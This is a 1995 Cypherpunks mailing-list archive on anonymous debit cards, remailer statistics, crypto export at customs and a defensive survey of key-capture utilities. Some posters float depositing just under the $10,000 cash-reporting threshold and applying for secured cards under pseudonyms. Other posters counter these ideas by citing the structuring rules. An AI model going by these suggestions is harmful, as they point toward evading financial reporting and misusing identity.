card no longer gets approved. Now because everything is prepaid, > there is no risk to me, so I'll put any name you want on the card. The > questions I have are: Sounds good.....and practical. ANY citizen in the world deposits with your "Bank" legal tender in an account. US dollars would likely fit the bill as they are pretty well accepted from North America to North Korea (black market maybe.....but still accepted :>). Then, when someone presents to your Bank proof of purchase/transfer etc (a digitally signed message with your PGP Key perhaps?) then you transfer a dollar figure from one account to another ...... assuming both purchaser and seller have accounts atthe Cypherpunk Bank. If the purchaser does.....but the SELLER doesn't, then (if so desired by the seller) you have three choices: 1) open an account, f/o (favour of.....sorry....I'm a Banker so pardon my lapsing now and agin into our jargon) of the seller, transferring in the requisite amount of US $ for the seller's later use (ie... then HE goes out and buys something over the 'Net). 2) wire to the sellers account (overseas?) through a correspondent bank to the sellers bank where he has an account the US $. 3) mail a draft in the appropriate US $ to the seller's designated address .....either snail mail or Fed Express, or whatever courier is selected. > Is this legal in the U.S.? Dunno....I'm in Canada. But I know that U.S. banking arrangements are medieaval so I doubt it. > If so, is anyone doing it? See above :> > If it's not legal in the U.S., is it legal anyplace else. Sure.....Canada right now has a fully operational debit card system in place. You go to a supplier to make a purchase and they run your bank card through a machine just like your credit card for the purchase. Difference being, $$$ from your chequing account are debited, as opposed to to the line of credit on your credit card being debited. You have dollars in the bank sufficient for the purchase, then no problem. > If this is a gray area, why wouldn't this scheme work? Its a perfectly workable scheme....IF...the BANK in question is trusted as the medium of exchange. Thats the ONLY thing stopping its implementation, namely having a trusted institution to handle the deposits/transfers. Lets put it this way, I think the scheme would have ALOT more acceptance if you as a seller presented your invoice for settlement at Chase Manhattan or Bank of Montreal as opposed to the Cypherpunk Bank :>. > If this scheme was set up, it appears to me that the infrastructure for > anonymous payments/netcash is already in place. Of course the issuer would Sure it is....co-ordinating the infastructure would be interesting, but doable. The main thing is....is it economically viable for the institution in question? Would there be enough commerce doneover the 'Net to justify implementation of the supporting infrastructure (ie Internet hook-up's, training of staff, etc). Once there exists a demand for the service, coupled with a reasonable rate of return to the Bank for provision of the service, then you'll see ALL the top 20 banks in the world do it. Until then, nobody will do it simply because the Cypherpunks think it is a good idea. :> -------------------------------------------------------------------------- Mark Terka | werewolf at io.org | public key (werewolf) by Toronto,Canada | dg507 at cleveland.freenet.edu | public key server or request --------------------------------------------------------------------------- From skaplin at skypoint.com Mon Jan 2 02:17:01 1995 From: skaplin at skypoint.com (Samuel Kaplin) Date: Mon, 2 Jan 95 02:17:01 PST Subject: Anonymous payment scheme In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > > Let's suppose myself and 10,000 of my closest friends form the First > > National Cypherpunk Bank and Trust. We go through all of the hassles in > > order to be the issuer of a Master Card or Visa. Now instead of having a > > credit line, it is set up as a debit card. The card's limit is how ever > > > Why jump through the hoops Visa or M/C would send you through if its a DEBIT > card??? You don't need them for something like that, simply the > acceptance of the Internet community, that credits from another user > drawn on the Cypherpunk Bank would be accepted.....which leads to your next > paragraph... I was looking at at the bigger picture. Any merchant who accepts Visa or MC could now accept anonymous payments. No hassle at all on their part. They probably wouldn't even know that it was an anonymous account. It fits into the existing infrastructure very nicely. A bank in Minneapolis has a similar system in operation. They issue you a Visa card. That card automatically debits your checking account. The key would be not to have the card attached to the account. If the card is attached to any type of account, then there are reporting requirements. A more apt analogy would be the prepaid phone cards. Walk into the issuing authority, plunk your $9999.99 on the counter and ask for your card. When you've spent it all, toss the card. Sam ============================================================================== Marriage is like a cage; one sees the birds outside desperate to get in, and those inside equally desperate to get out. - Michel Eyquem de Montaigne ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLwfRXMlnXxBRSgfNAQH0twf+Is7Gur7MlN1djLdLKQ5N1Qcf+9tM4hD8 II+4Z3lSFsCYV3K30Iochnqr+9am8C08LZYk0uUqhW/EEhCkHIlivBniIHXNgvZ/ XbTqiZyAwP7E+8CQNbNywoRqJ46WKRgQpvpDFgSDUmnUzQliRzoBzsU6cwJY+uYp YLzpNkm+knleEDgAa978GaZsTK57wjkZ6ald2/gRoXzF4Pd0FW/lBd+KcSIq9KZN hU/VJ3dh6NDqbXbu92RjCl+Ba+UL3Ljk/+k4Gc+aQOV5f6vghOYmsVy9pqjz8R7a IfORPuLFYRDemWGjBF6vmWfkrOACdl6HLx5RdQd5eDfWqXFpDzE8eQ== =Y8cO -----END PGP SIGNATURE----- From eric at remailer.net Mon Jan 2 05:45:01 1995 From: eric at remailer.net (Eric Hughes) Date: Mon, 2 Jan 95 05:45:01 PST Subject: Anonymous payment scheme In-Reply-To: Message-ID: <199501021344.FAA11566@largo.remailer.net> From: skaplin at skypoint.com (Samuel Kaplin) I was looking at at the bigger picture. Any merchant who accepts Visa or MC could now accept anonymous payments. No hassle at all on their part. [...] The key would be not to have the card attached to the account. If the card is attached to any type of account, then there are reporting requirements. Visa was talking about an electronic traveller's check, which, from what I could tell, instantiated an account in the sum of the value of the card purchased, which was then drawn down by purchase. The card, evidently, had no embossing on it. Personalization was limited to some account id which would last the lifetime of the balance and then disappear. Eric From sommerfeld at orchard.medford.ma.us Mon Jan 2 06:36:02 1995 From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld) Date: Mon, 2 Jan 95 06:36:02 PST Subject: Exporting cryptographic materials, theory vs. practice In-Reply-To: <9501020724.AA01894@dun-dun-noodles.cam.ov.com> Message-ID: <199501021422.JAA00361@orchard.medford.ma.us> -----BEGIN PGP SIGNED MESSAGE----- > >> My conclusion from all this is that it just isn't possible for an > >> individual traveler to follow the rules. > > I can think of a at least half a dozen cypherpunks who will be going > to IETF in Stockholm in July. I suspect there are more. Perhaps we > should all arrange to take the same flight, while carrying some bit of > approved-for-export material. Should drive the Customs guys > completely nuts. Actually, those of us who are going should arrange to take *separate* flights... My reading of Matt's message said that most of the time was spent trying to figure out what to do, and only a little time was spent actually doing it. If a bunch of people all take the same flight, it will take them only a slight bit longer to process the whole bunch of you than if one person on the flight was doing it... - Bill -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLwgMDLT+rHlVUGpxAQFJ4wP/VGVDeueP0Z2hFHy/LUZ65ed69RpwYv0X //Ser1wiS7/y0WKFU6+xWH+0IffDOWgXVv4V3h1Rs8jTtEfKb46TtFTcnIM2qKr5 OYMy8ERPiMn3nx3I3slkVWYhSQQo/SwOOt/wSBZ72KjoSvWuf1wZCo++bOu773zp mPN6RxAuR4c= =R/1O -----END PGP SIGNATURE----- From raph at CS.Berkeley.EDU Mon Jan 2 06:49:15 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 2 Jan 95 06:49:15 PST Subject: List of reliable remailers Message-ID: <199501021450.GAA02030@kiwi.CS.Berkeley.EDU> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.bsu.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"vox"} = " cpunk pgp. post"; $remailer{"avox"} = " cpunk pgp post"; $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"rebma"} = " cpunk pgp hash"; $remailer{"jpunix"} = " cpunk pgp hash latent cut post ek"; $remailer{"c2"} = " eric pgp hash"; $remailer{"soda"} = " eric post"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub"; $remailer{"usura"} = " cpunk pgp. hash latent cut post"; $remailer{"desert"} = " cpunk pgp. post"; $remailer{"nately"} = " cpunk pgp hash latent cut"; $remailer{"xs4all"} = " cpunk pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk pgp hash latent cut post ek"; $remailer{"rahul"} = " cpunk"; $remailer{"mix"} = " cpunk hash latent cut ek"; $remailer{"q"} = " cpunk hash latent cut ek"; catalyst at netcom.com is _not_ a remailer. Last ping: Mon 2 Jan 95 6:00:02 PST remailer email address history latency uptime ----------------------------------------------------------------------- nately remailer at nately.ucsd.edu +++++++++++* 32:53 99.99% mix mixmaster at nately.ucsd.edu +++++++++-+ 41:39 99.99% rahul homer at rahul.net --***#***#** 9:40 99.98% penet anon at anon.penet.fi ********+*** 26:09 99.99% vox remail at vox.xs4all.nl .-..------- 12:53:05 99.99% soda remailer at csua.berkeley.edu .-.._-.-.. 8:50:49 99.67% usura usura at replay.com *****+- -- * 22:53 99.33% flame tomaz at flame.sinet.org ** *-*-*-** 32:52 99.09% jpunix remailer at jpunix.com ** *-#-*-** 32:26 99.06% c2 remail at c2.org --__.-+*--** 2:50:57 98.95% rebma remailer at rebma.mn.org ---*----* 7:52:32 99.27% ideath remailer at ideath.goldenbear.com ++* ++** - 2:09:26 98.05% bsu-cs nowhere at bsu-cs.bsu.edu +* --#+##** 1:40:45 96.01% q q at c2.org --_ . --+ 6:03:15 92.56% alumni hal at alumni.caltech.edu *****#*++ *- 27:00 89.60% portal hfinney at shell.portal.com #*#**#*** *- 21:31 89.60% extropia remail at extropia.wimsey.com +.-+* +++ 12:38:44 77.66% xs4all remailer at xs4all.nl *** *-- 20:22 75.57% desert remail at desert.xs4all.nl ----____.-- 40:43:30 71.96% For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). Options and features cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. oldpgp Remailer does not like messages encoded with MIT PGP 2.6. Other versions of PGP, including 2.3a and 2.6ui, work fine. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. special Accepts only pgp encrypted messages. ek Encrypt responses in relpy blocks using Encrypt-Key: header. Comments and suggestions welcome! Raph Levien From pcassidy at world.std.com Mon Jan 2 07:27:25 1995 From: pcassidy at world.std.com (Peter F Cassidy) Date: Mon, 2 Jan 95 07:27:25 PST Subject: exponential relationship of crytographer and cryptanalyst Message-ID: - I'm writing a piece on the politics of surveillance/privacy technologies for OMNI, essentially a survey of their advance since the 1967 proposal for the National Data Center. I cover cryptography, deriving the narrative from Clipper Chip initiative. The point I'm trying to make is that given the market forces pushing commerce onto the public networks and the increasing power of available encryption, the cold war national apparatus will have to mobilize quickly a la digital telephony to stomp it - yet the nature of computing puts them in a loosing position in the long run. Toward the latter part of this thesis, I've been told - and want check with youz - of the exponential relationship of crytographer and cryptanalyst. The heart of this relationship has been explained to me as follows: Increasing the key by one bit effectively doubles the number of keys and proportionally increases the power required to break it in a brute force attack. Is this true? Is there a truer way of stating it? Are there complicating factors this excludes that I should discuss? - Regards, - Peter Cassidy From jrt at asiaonline.net Mon Jan 2 08:58:31 1995 From: jrt at asiaonline.net (jRT) Date: Mon, 2 Jan 95 08:58:31 PST Subject: Anonymous payment scheme In-Reply-To: Message-ID: Well, I know some shops have so called 'switch' or 'smart' cards to debit your account, some of these are on their own credit line, others are not. I have an account with a bank in Britain which gives me a "VISA" Card which is actually a 'direct-debit' card. I can use it (and have) all around the world as a regular VISA card and in any 'VISA compatible' ATM. As soon as my balance drops to zero, I can no longer use it. And when I do, the money jumps out of my account immediately and can no longer be used. This is a bank-issued card, and also acts as my ATM card to access my current account - there is NO charge for this. I'm not sure exactly how that works. Whether or not VISA would accept a proposal from First National Cyberphunks or not remains to be seen... ------------------------------------------------------------------------------ jrt at AsiaOnline.Net john at AsiaOnline.Net PO Box 86141, Govt PO, Kln, HKG. Help protect the environment : This message is made from recycled electrons ------------------------------------------------------------------------------ > Let's suppose myself and 10,000 of my closest friends form the First > National Cypherpunk Bank and Trust. We go through all of the hassles in > order to be the issuer of a Master Card or Visa. Now instead of having a > credit line, it is set up as a debit card. The card's limit is how ever > much you have prepaid the bank in advance. Once you have hit your prepaid > amount the card no longer gets approved. Now because everything is prepaid, > there is no risk to me, so I'll put any name you want on the card. The > questions I have are: From nobody at rahul.net Mon Jan 2 09:25:20 1995 From: nobody at rahul.net (nobody at rahul.net) Date: Mon, 2 Jan 95 09:25:20 PST Subject: Exporting cryptographic materials, theory vs. practice Message-ID: <199501021725.AA09061@bolero.rahul.net> Matt has a good story, and the lesson that he draws, that presently the average person can't follow the rules, seems valid. But I don't see the point of the proposals to replicate his experiment. Doesn't Matt's experience really show simply that not enough people try to follow the rules, so the agencies aren't set up yet to make it easy? Is it our goal to change this, to get Customs to streamline their operation so that everyone really does register their crypto equipment on travels overseas? It seems to me we are better off with the present informal system where you can actually use crypto overseas without worrying much. I could see a system where you routinely fill out and have your card stamped when you check your luggage to show that you are carrying crypto. Then you turn it in when you come back. This might not be too different from what you do now when you declare items you are taking out and bringing back to show they are free of customs duties. How does this advance the CP cause? From jya at pipeline.com Mon Jan 2 10:26:08 1995 From: jya at pipeline.com (John Young) Date: Mon, 2 Jan 95 10:26:08 PST Subject: (Fwd) Re Anonymous posting Message-ID: <199501021826.NAA11086@pipe2.pipeline.com> For those interested in the anonymity issue there is a lively debate on list Cyberia-L (a legal list) which was stimulated, in part, by Peter Lewis's articles on anonymity and the LaMacchia case dismissal. For participation send message to: listserv at listserv.cc.wm.edu subscribe cyberia-l Your name Provocatively, I forward the following: Forwarding mail by: jsilverm at reach.com (Jared Silverman -- NJ Bureau of Sec. - Newark) on Mon, 2 Jan 11:58 AM ------------------- On January 1, 1995, Buford Terrell wrote: >Anonymity is very much a core 1st Amendment value and at the >center of both political speech and the right to assemble. [Snip] >Often times, the only way weak or unpopular minorites can speak >is anonymously. There have been many times when to couple one's >name to one's writings would be to invite martyrdom. I had >rather risk a few perverts than to stifle this most important >channel for dissent. It is one thing to claim First Amendment protection to shield political speech, IMHO it is another to shield fraud and criminal behavior. Besides the First Amendment runs against the government, not in favor of individuals in actions brought by private parties. In the sexism thread, would anyone claim that an individual has the right to harass or stalk a person under the guise of the First Amendment? Would the First Amendment be a defense in a defamation suit? Of course not (Times v. Sullivan aside). Doesn't an individual have the right to know the identity of someone who is trying to communicate with him/her on a private basis? To a certain extent, the question was crystallized in the caller ID debate -- Who has the superior right, the calling party to anonymity or the called party to knowing who is calling? One of the areas of my professional concern is the use of cyberspace for securities fraud and manipulation. Cyberspace is an ideal medium for these activities because of the availability of anonymity and pseudonymity. Even on commercial BBSs, where "member lists" are available, posting to these lists is voluntary and those who draw my attention are rarely on these lists. Does all of cyberspace become off limits to conventional private rights and law enforcement under the rubric of "freedom of speech and assembly?" |--------------------------------------------------------------| |A. Jared Silverman, Chief-New Jersey Bureau of Securities | |jsilverm at reach.com | 201-504-3600 (phone) | 201-504-3601 (fax)| |**************************************************************| | My purpose holds to sail beyond the sunset - Tennyson | |**************************************************************| |The foregoing is the personal opinion of the sender and is not| |the official position of either the Bureau of Securities or | |the New Jersey Attorney General and the Department of Law and | |Public Safety. Affiliation given for identification only. | |--------------------------------------------------------------| From shamrock at netcom.com Mon Jan 2 11:03:09 1995 From: shamrock at netcom.com (Lucky Green) Date: Mon, 2 Jan 95 11:03:09 PST Subject: Anonymous payment scheme Message-ID: Samuel Kaplin wrote: >Let's suppose myself and 10,000 of my closest friends form the First >National Cypherpunk Bank and Trust. We go through all of the hassles in >order to be the issuer of a Master Card or Visa. Now instead of having a >credit line, it is set up as a debit card. The card's limit is how ever >much you have prepaid the bank in advance. Once you have hit your prepaid >amount the card no longer gets approved. Now because everything is prepaid, >there is no risk to me, so I'll put any name you want on the card. The >questions I have are: > >Is this legal in the U.S.? > >If so, is anyone doing it? This type of card is issued with just about every checking accunt in Oregon. I don't know about other states, except that here in California I know of only two that are doing it: Charles Schwaab and Glendale Federal. There may be more, but I have yet to hear about them. In Oregon you get such an ATM/Visa card instead of your regular ATM card. Good credit, bad credit, no credit. Now if I could just remember what its called... -- Lucky Green PGP encrypted mail preferred. From blane at seanet.com Mon Jan 2 12:17:47 1995 From: blane at seanet.com (Brian Lane) Date: Mon, 2 Jan 95 12:17:47 PST Subject: Anonymous payment scheme In-Reply-To: Message-ID: On Tue, 3 Jan 1995, jRT wrote: > > Well, I know some shops have so called 'switch' or 'smart' cards to debit > your account, some of these are on their own credit line, others are not. > > I have an account with a bank in Britain which gives me a "VISA" Card > which is actually a 'direct-debit' card. I can use it (and have) all > around the world as a regular VISA card and in any 'VISA compatible' ATM. Alot of the banks in the US are now offering these cards for use with checking accounts. > > As soon as my balance drops to zero, I can no longer use it. And when I > do, the money jumps out of my account immediately and can no longer be used. > > This is a bank-issued card, and also acts as my ATM card to access my > current account - there is NO charge for this. I'm not sure exactly how > that works. When a charge is made to the card it is subtracted from the balance until midnight? of that night. If the actual charge does not come in to the bank, the amount is then added back to the balance. (This was learned thru my GF who had some trouble with her card -- forgot to write down a couple of transactions and ended up at zero). > > Whether or not VISA would accept a proposal from First National > Cyberphunks or not remains to be seen... I think they should. If they would is another matter. It would be similar to having a 'secret' Swiss bank account that can be accessed from anywhere in the world, converted to cash at cash machines, transferred to others, etc. I like the idea of an anonymous Visa better than some sort of new net-bank because it is already established, the mechanism for transfer is already in place, and for the most part de-bugged. If there was an Anonymous Visa debit card I'd defiantly go for it. It would certainly keep those marketing types from tracking my spending patterns. Brian ------------------------------------------------------------------------------ "Everyone is a prisoner holding their own key." | finger blane at seanet.com -- Journey | PGP 2.6 email accepted ------------------------------------------------------------------------------ From pstemari at erinet.com Mon Jan 2 12:38:34 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Mon, 2 Jan 95 12:38:34 PST Subject: Anonymous payment scheme Message-ID: <9501022030.AA03421@eri.erinet.com> At 03:52 AM 1/2/95 -0600, Samuel Kaplin wrote: >... I was looking at at the bigger picture. Any merchant who accepts Visa or MC >could now accept anonymous payments. No hassle at all on their part. They >probably wouldn't even know that it was an anonymous account. It fits into >the existing infrastructure very nicely. If you can convince BankAmerica or MasterCard International to deal with you. > ... Walk into the issuing authority, plunk your $9999.99 on the counter and > ask for your card. When you've spent it all, toss the card. Right there you imply one of the requirements you'd need to fulfill--the reporting requirements on cash transactions over $10K. If you accepted many deposits over $5K, you probably get asked a lot of questions about how you're preventing people from structuring transactions to avoid the reporting requirement. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From entropy at IntNet.net Mon Jan 2 13:00:10 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Mon, 2 Jan 95 13:00:10 PST Subject: Regarding anonymous debit cards.. In-Reply-To: Message-ID: > Alot of the banks in the US are now offering these cards for use with > checking accounts. Yes. There are also the ``secured'' credit cards where one deposits X dollars into the issuing bank and is allowed 1.5 * X in credit. Many of these will promote to ``real'' credit cards after a year or some specific amount of charging that's been paid back on time (usually about $1000). These are a godsend for those who've gone bankrupt; as such I wouldn't be terribly surprised if the issuers didn't even bother to do a credit check until the card promotes, if at all. If this is the case, what's to stop someone from filling out the application under a pseudonymous identity with a mail drop as the contact address? > I think they should. If they would is another matter. It would be > similar to having a 'secret' Swiss bank account that can be accessed from > anywhere in the world, converted to cash at cash machines, transferred to > others, etc. It's a great idea - at last year's Siggraph convention I needed to stay in contact with an associate 24 hours a day if need be. I discovered that in the Kinko's in the Orange County Convention Center there's a cellular phone rental machine, but it took credit cards and the people at the desk wouldn't let me rent one without one - even though I offered to leave my ID and a sizable deposit. I'm technically not old enough to get a credit card, and regardless of that fact when I spoke to someone at Barnett Bank about getting one and listed my occupation as 'Consultant' she laughed in my face. Solution: I got a secured card from a bank in Vermont. They have $500 of my money in an account, and I have a card with a $500 limit in my father's name. > If there was an Anonymous Visa debit card I'd defiantly go for it. It > would certainly keep those marketing types from tracking my spending > patterns. Without a doubt. I wonder, again, if the issuing bank even _cares_ who you are if you get one of these secured cards. There was discussion here about debit/secured cards some time ago - anyone remember the upshot of the discussion? -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From KEY-CAPTURE at lsd.com Mon Jan 2 13:00:53 1995 From: KEY-CAPTURE at lsd.com (Dave Del Torto) Date: Mon, 2 Jan 95 13:00:53 PST Subject: RFC: Key Capture Utility Survey Message-ID: REQUEST FOR COMMENTS ON KEY CAPTURE UTILITIES --------------------------------------------- Key capture utilities present a serious threat to the security of passwords on individual and networked computing systems, especially when novice users are unaware of their presence. Well-educated users and administrators help make all systems on and off the Internet more reliably safe for everyone's data. If you are a: -- privacy, system security or cryptography advocate/activist -- network admin concerned with the password-hygiene of your users or -- computing professional with an appreciation of good security, then please complete and return this quick survey. By contributing to the knowledgebase on the subject of password protection, you can help educate yourself and many novice/intermediate users about a common weakness -- utilities that may capture their keystrokes unseen as they enter their *password* -- in ALL secured systems (a user's encryption app, your network or its dial-in access, your company's email system or database fileserver, etc.). The intent here is to create a *central list of all key-capture utilities* which will help people to at least be aware of their existence or operation on a given system and describe in simple terms how to disable the utility. The results of the survey will be tabulated and put in the public domain on the Internet. If your reply is included, your name will be acknowledged in the resulting document, which will be: part of the new "Beginner's PGP FAQ" for new users of the PGP (Pretty Good Privacy) application; a msg posted on various Internet lists and online services and; a text file available by anonymous FTP as: ftp.netcom.com:/pub/dd/ddt/crypto/crypto_info/key_cap_util.txt Please forward this survey to anyone you think can/will help - and thanks in advance for your contribution! _______________________________ THE KEY CAPTURE UTILITY SURVEY: The survey is very easy to participate in. Just send as much information as you can, even if you're only partially able to complete the form. Every piece of information that can lead us to the utility - even just a fragment of a name and an email address of someone who might know more about it - will help us compile a fairly exhaustive list. To assist us in easily tabulating the incoming mail on this topic, please send your reply to: - - - - Format your answer as follows: ******* PLEASE RETURN ONLY THIS INFORMATION ******* TO: KEY-CAPTURE at lsd.com SUBJ: PLATFORM/Utility Name MSG BODY: [1] OPERATING-SYS <--- i.e. WIN/DOS/MAC/OS2/UNIX, etc. [2] "Utility-Name" (utility-package-name, if not a stand-alone product) [3] Developer-Name (company-individual) [4] [5] Type <--- i.e.: system extension, autoexec, TSR [6] Path-to-file-location-when-loaded. [7] How to disable the utility's key capturing operations (step-by-step if possible). Please be brief, but aim for a novice level user. If disabling the key capturing is too complex to describe easily, then just explain what the user should ask a sys admin to do for them (while they watch, if applicable). *************************************************** (Here's an Example:) SUBJ: MAC/Now Save MSG BODY: [1] MAC [2] "Now Save" (Now Utilities v5.x), "NowSave" (Now Utilities v4.x) [3] Now Software, Inc. [4] [5] System extension/Control Panel device (CDEV) [6] [startup HD]:System Folder:Control Panels:Now Save (or :NowSave) [7] How to Disable: Open the "NowSave" (v4.x) or "Now Save" (v5.x) Control Panel. v4.x: Click the "Preferences" button. Click the "Key Capture..." button. Click the "OFF" radio button (upper right corner of dialog). Click the "OK" button. v5.0: Click the "Key Capture..." button in the button-bar. Click the "OFF" radio button (in upper right corner of dialog). Click the "OK" button. From tcmay at netcom.com Mon Jan 2 13:04:22 1995 From: tcmay at netcom.com (Timothy C. May) Date: Mon, 2 Jan 95 13:04:22 PST Subject: Reminder: January 14th "Tools Demo Day" Meeting Message-ID: <199501022104.NAA01913@netcom19.netcom.com> This is a reminder that the January 14th "Tools Demo Day" meeting is coming up, standard place and time at the Silicon Graphics building in Mountain View, CA. I described this several weeks back and asked for folks interested in demonstrating any sort of software tools, crypto code, languages, etc., to get in contact with me. One person, Henry Strickland (Strick), has done so. In any case, the meeting will go on. I'll have my PowerMac 7100 there, and will demo some things like Mathematica, SmalltalkAgents, MacPGP, etc. An SGI Unix box is of course available. An Intel box running something of interest will presumably be brought by someone. Anyone planning to demo something should either plan to run on a machine they know will be there, or bring their own. A video projector is sometimes usable, and I plan to bring my video camera. The idea is that laptops and other non-video out systems can still be seen by lots of folks. (Someone mentioned also that an LCD projector may be available.) The normal meeting time is 12-5, but people usually spend the first hour shmoozing and eating their burritos, so I plan on starting the formal meeting at 1 (but don't get there at 1 and _then_ expect to shmooze/eat for the next hour!). The machines should be ready to go by 1:30 at the latest, so that demos can begin. If we have a lot of demos--not likely based on current information--then I'll propose parallel tracks. Please don't be bashful about doing a demo! The idea is to educate and expose people to tools and software they might otherwise only vaguely know about. Demos don't have to polished and professional. And please send me a brief note if you want to demo something. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From hfinney at shell.portal.com Mon Jan 2 13:20:50 1995 From: hfinney at shell.portal.com (Hal) Date: Mon, 2 Jan 95 13:20:50 PST Subject: Anonymous payment scheme Message-ID: <199501022121.NAA07411@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- There are a couple of issues here. One is whether you could get a debit card with another name printed on it than your own. Sandy Sandfort and some others have suggested here that this would be legal and possible already as long as you don't do it with the intention to commit fraud. You can open a secured account by mail and give a false name. I'm not sure what you do in this situation if they ask to see some ID when you try to use the card. This would be rather embarrassing, it seems to me. Sorry, I guess I left my drivers license in my other pants... Or, never mind, try this card. That other one was from before I changed my name... The other issue is whether you could set up a payment system which did not require social security numbers from the participants. I think this is much more questionable. Although the phone cards and some other restricted usage systems are apparently legal, bank accounts seem to have many more restrictions. Barter and scrip systems are also heavily regulated. All these laws involving reporting requirements, etc., were passed to help the government track the flow of money. There is no way the government is going to make an exception at this point. In fact, I suspect that if the limited systems expanded to where they were used for general payments, the government would crack down. I recall reading that just such a crackdown occured in Las Vegas when casino chips started to be accepted for non-gambling payments. So, you may be able to have a form of anonymity from the person you are transacting with, but I don't think you can be anonymous from the bank and from the government. And personally, I am more concerned about the bank and gov't tracking my spending patterns than whether the guy I buy gas from knowing my name. The bank has a lot more information about me which is much more threatening to my privacy. A nom de guerre VISA or debit card does not seem to help this problem. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLwhuNRnMLJtOy9MBAQEkPQIAqEEglLxt8E4Rrgh7dR93fuCSJUI+UMgF 3XUrsTxM4whOejFMrluOAYM+2RdBOgYTk1mNEiAgSUPLLScIa9zU5A== =CF5G -----END PGP SIGNATURE----- From jcorgan at scruznet.com Mon Jan 2 13:43:20 1995 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Mon, 2 Jan 95 13:43:20 PST Subject: Reminder: January 14th "Tools Demo Day" Meeting Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Some may recall an idea I wrote about a couple weeks ago to provide transparent encryption/signing/remailing facilities to users of Windows Sockets based mail agents on PC's (e.g., Eudora). I have completed an initial portion of the program as a "proof of concept." All it does right now is act as a SMTP server and accepts mail from a mail agent, performs requested encryption/signing operations on received messages, and puts RFC 822 compliant outbound messages in a directory for submission to a 'real' SMTP server. (No remailing features present). Of course, the next module to write is the SMTP client that takes this outbound message queue and sends it off to the actual SMTP server. It is a bare bones app with no user interface, fault tolerance, or configuration options, and probably only works on my machine at the moment :) I don't expect to make any significant progress on the program between now and the Jan. 14 meeting, but if anyone is interested I will bring it to the meeting and "demo" what little there is at the moment. == Johnathan Corgan "Violence is the last refuge of the incompetent." jcorgan at scruznet.com -Isaac Asimov WWW: ftp://ftp.netcom.com/pub/jc/jcorgan/www/homepage.html -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLwhxw+lPfVlQ1n99AQH6CAf8DJmXqtuP24C39k3/qk4mRuGxm4IehWdQ zdFjTgrzMuTXuM4SOtkV1k+JGZrjAW5G+tqiNLbNHDDzCWC/75G/8HMjUdWMSINq gOHXUl3oKtm6R27ClGhIZKuWJwLF0UH4XpUDWvawj5lFdWhKmSThuuF3WG1RKivQ PZjRh6Iq7wHf9wFI+rFRi8UHu311ZcyW4jR4h5R7siFeTd9GcBCEJ9CCQy+j+Vsu AbplhNZVztooLVitsAkYdcNu2gcAdun5u7WOPuEIM/Mwsokg53z4+AoUrYCkjqmu sqeAVr/S+1fwKXjMTSxt7qpIEUkErzTzhgQeQgLWYcUcnHg71A8AiA== =rOcl -----END PGP SIGNATURE----- From dave.hodgins at canrem.com Mon Jan 2 13:58:58 1995 From: dave.hodgins at canrem.com (Dave Hodgins) Date: Mon, 2 Jan 95 13:58:58 PST Subject: key servers list Message-ID: <60.18197.6525.0C1C6B79@canrem.com> -----BEGIN PGP SIGNED MESSAGE----- Does anyone have an up-to-date list of pgp keyservers available? Is there a fingerable keyserver, like wasabi at io.com used to be? Thanks in 